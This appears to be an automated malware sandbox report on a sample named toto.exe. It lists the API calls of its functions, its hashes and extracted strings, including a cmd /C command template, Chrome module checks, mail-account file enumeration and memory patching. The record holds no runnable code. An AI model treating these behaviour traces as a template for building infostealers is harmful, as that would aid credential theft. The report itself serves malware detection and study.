  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 128
  • API ID: lstrlen$RtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 1738276641-0
  • Opcode ID: aaba7d0a47ca100521561682d36ca88f08b4b9b0e2dd2eccb0d3987922e97ba9
  • Instruction ID: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
  • Opcode Fuzzy Hash: B7C012A4436C87C88CC059470679660D1C55FF6B0001C530BB0542A31D47523AB6758D
  • Instruction Fuzzy Hash: 04f6259f9de803d6081a88a86dd7e0bed0a00ae35ae990a34112351bed970a8e
APIs
  • lstrlenW.KERNEL32(00000000,01B342EB,?,01B32F72,00000000,FF571A75), ref: 01B34662
  • lstrlen.KERNEL32(01B32F72,?,01B32F72,00000000,FF571A75), ref: 01B3466D
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 01B34682
  • wsprintfW.USER32 ref: 01B3469A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name:d3d8sext.exe
Process MD5:2977C206A36F6D0CEC371F9F767DE1D3
Total matches:155
Initial Analysis Report:Open
Initial sample Analysis ID:63005
Initial sample SHA 256:663E6F25B541228C0555C984846E342BF801CAD542414DDD222BB947DEA49D56
Initial sample name:toto.exe

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
